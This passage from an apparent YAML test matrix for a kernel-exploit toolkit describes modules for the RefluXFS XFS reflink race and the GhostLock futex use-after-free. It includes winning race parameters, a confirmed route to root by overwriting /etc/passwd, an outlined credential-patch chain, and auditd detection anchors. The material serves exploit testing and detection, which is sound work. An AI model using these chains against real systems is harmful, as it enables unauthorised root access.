Stock GenericCloud layout needed NO provisioner changes: root is /dev/vda4 XFS with reflink=1 out of the box, which is exactly why this CVE hits the RHEL family so broadly. Results: detect() -> VULNERABLE (found writable XFS at /var/tmp); the rpm-family vendor-backport caveat fired correctly; `--active` FICLONE witness -> reflink CONFIRMED; phase A observed FIEMAP_EXTENT_SHARED on a real shared extent (note: btrfs never reported that flag during host-side testing, XFS does — which is why the module treats FICLONE success, not FIEMAP, as the authoritative gate); O_DIRECT available; scratch dir self-cleaned with no artifacts; the source also built clean on el9 gcc. The SHIPPED trigger (8 writers / 2 helpers / 16 rounds / 2s) ran and did NOT win — that is INTENDED under-driving, not a defect. THE UNDERLYING BUG WAS SEPARATELY CONFIRMED WINNABLE on this kernel: the full-chain root pop above is the proof (the same race rewrote /etc/passwd, 3/3). An earlier non-destructive own-files measurement at the public PoC's parameters (32 writers / 8 helpers, 60s budget) won 4/4, first divergence after 69, 114, 170 and 494 rounds — a racing O_DIRECT write landed on a still-shared block and rewrote the donor's on-disk bytes, i.e. the arbitrary-overwrite primitive observed directly, contained to files the test user owned. No oops, no dmesg output, no instability — consistent with a data-oriented bug. Takeaway for future sweeps: a non-win from the shipped trigger must NEVER be recorded as 'patched'; trust the version gate and the vendor erratum."
|
||||
notes: "CVE-2026-64600 'RefluXFS'; XFS reflink CoW ILOCK-cycling TOCTOU race (Qualys TRU, Saeed Abbasi; advisory credits model-assisted analysis with Anthropic; video PoC on RHEL 10.2). Introduced 4.11 (3c68d44a2b49, direct-I/O CoW alloc in iomap_begin); fixed 2f4acd0fcd86 (mainline 7.2-rc4, merged 2026-07-16), stable backports 7.1.4 / 6.18.39 / 6.12.96; the 6.6/6.1/5.15/5.14/5.10/4.19/4.18 lines have no upstream stable fix. PROVISIONER REQUIREMENT — unlike every other module in this matrix, detect() has a STORAGE precondition, and all five boxes here are Debian/Ubuntu with ext4 roots, so a stock box correctly returns PRECOND_FAIL. To exercise the VULNERABLE path the provisioner must create a reflink-enabled XFS volume the unprivileged user can write to, e.g.: `truncate -s 2G /var/tmp/xfs.img && mkfs.xfs -m reflink=1 /var/tmp/xfs.img && mkdir -p /mnt/xfs && mount -o loop /var/tmp/xfs.img /mnt/xfs && chmod 1777 /mnt/xfs` (Ubuntu 22.04 ships xfsprogs 5.13, where reflink=1 is already the mkfs default). detect() finds it by scanning /proc/mounts for fstype xfs and confirming statfs() f_type == XFS_SUPER_MAGIC + write access — note it deliberately does NOT accept a successful FICLONE as proof, since btrfs implements FICLONE and is unaffected. Without the provisioner step, expect_detect is PRECOND_FAIL; with it, VULNERABLE. Both verdicts are worth recording. The version+precondition matrix is also covered by the 14 detect() unit rows in tests/test_detect.c (incl. 4.18/5.14 el8/el9 bases, the 6.13.0 'newer than some entries but not all' case, and the no-XFS PRECOND_FAIL row) driven via SKELETONKEY_XFS_ASSUME_REFLINK=1/0. IDEAL TARGET, NOT IN THIS MATRIX: a Rocky/Alma/CentOS Stream 9 box, where XFS+reflink is the INSTALLER default and no provisioner step is needed — that is the real affected population (RHEL/CentOS/Rocky/Alma/Oracle/CloudLinux 8-10, Fedora Server >= 31, Amazon Linux 2023) and is the reason this module ships unverified. Adding an rpm-family box to boxes/ is the follow-up. CAVEAT for any rpm-family sweep: those vendors backport WITHOUT bumping the upstream version (a patched el8 kernel still reports 4.18.0-*), so a VULNERABLE verdict there reflects the upstream base version only and must be reconciled against the RHSA/ELSA/ALSA/RLSA erratum — detect() prints that warning itself. exploit() forks a child that works ONLY inside a private mkdtemp scratch dir on two files it owns: it establishes a shared extent (FICLONE, corroborated by FIEMAP_EXTENT_SHARED) and an O_DIRECT gate, then races a HARD-BOUNDED 8 writers / 2 ftruncate+fdatasync helpers / 16 rounds / 2s and stops, reading the donor back with O_DIRECT (a buffered read would be served from the page cache the corruption bypasses) and reporting divergence honestly. DELIBERATELY UNDER-DRIVEN (public PoC uses 32 writers / 8 helpers) and it NEVER clones or targets a file it does not own — the /etc/passwd overwrite -> su -> root step persistently rewrites a system file on disk with no undo and is NOT bundled. Returns EXPLOIT_FAIL. Provisioner note — this is SAFER to run than the other reconstructed race triggers, not more dangerous: the bug corrupts file DATA, not kernel memory, so there is no oops/KASAN/panic path, and a won race damages 4 KiB of a scratch file the module then deletes. Safety rank 55. Detection: auditd/sigma anchor on ioctl request 0x40049409 (FICLONE) and openat O_DIRECT; the yara rule matches the on-disk artifact because FIM CANNOT see this attack (the write bypasses the victim inode, leaving mtime/ctime/size untouched). Sweep + trigger validation pending."
|
||||
|
||||
# ── ghostlock (CVE-2026-43499) addition ─────────────────────────────
|
||||
|
||||
ghostlock:
|
||||
box: ubuntu2404
|
||||
kernel_pkg: ""
|
||||
kernel_version: "6.8.0-generic" # >= 2.6.39, below the on-branch fix (no 6.8 backport; not newer than all entries) → VULNERABLE by version
|
||||
expect_detect: VULNERABLE
|
||||
notes: "CVE-2026-43499 'GhostLock'; rtmutex/futex requeue-PI remove_waiter() stack UAF (VEGA / Nebula Security, 'IonStack part II'; public PoC in NebuSec/CyberMeowfia, Apache-2.0). Introduced 2.6.39 (PI-futex requeue); fixed 3bfdc63936dd (7.1-rc1), stable backports 7.0.4 / 6.18.27 / 6.12.86 / 6.6.140 / 6.1.175; 5.15/5.10/5.4/4.19 affected with NO upstream fix. detect() is a PURE version gate over that five-branch table — no userns/CONFIG probe (CVSS PR:L, any local user; CONFIG_FUTEX_PI assumed, near-universal); on Ubuntu 24.04 stock 6.8.0 (below the fix, not newer than all entries) it returns VULNERABLE. To also confirm the PATCHED verdict, boot a >= 7.0.4 / 6.12.86 / 6.6.140 / 6.1.175 on-branch or 7.1 kernel and expect OK; the multi-branch table is exercised by the 9 detect() unit rows in tests/test_detect.c (incl. 6.13.0 → VULNERABLE, the 'newer than some entries but not all' case). exploit() forks an isolated child that (A) deterministically confirms the -EDEADLK remove_waiter() rollback path is reachable (SAFE — without a concurrent priority walk the unwind creates no dangling pointer; validated on real hardware) and (B) exercises the actual race a HARD-BOUNDED 24 iterations / 2s with a sibling-CPU sched_setattr(SCHED_BATCH) storm on the waiter tid, then stops. DELIBERATELY UNDER-DRIVEN: does NOT widen the copy_from_user window (no memfd/PUNCH_HOLE), does NOT spray/reoccupy the freed kernel-stack frame, and does NOT bundle the KernelSnitch page leak → forged rt_mutex_waiter → fops/configfs/ashmem/pipe R/W → cred patch (Android/Pixel-specific, per-build offsets). Trigger RECONSTRUCTED from the public PoC — NOT VM-verified. Lowest --auto safety rank (11). Provisioner caution: run only in a throwaway VM/snapshot — a WON Phase-B race corrupts the kernel STACK and drives a near-arbitrary pointer write (near-certain PANIC on a vulnerable kernel). Detection has a real signature (futex requeue-PI returning EDEADLK + sibling sched_setattr(SCHED_BATCH)); no yara. Sweep + trigger validation pending."
|
||||
|
||||
Reference in New Issue
Block a user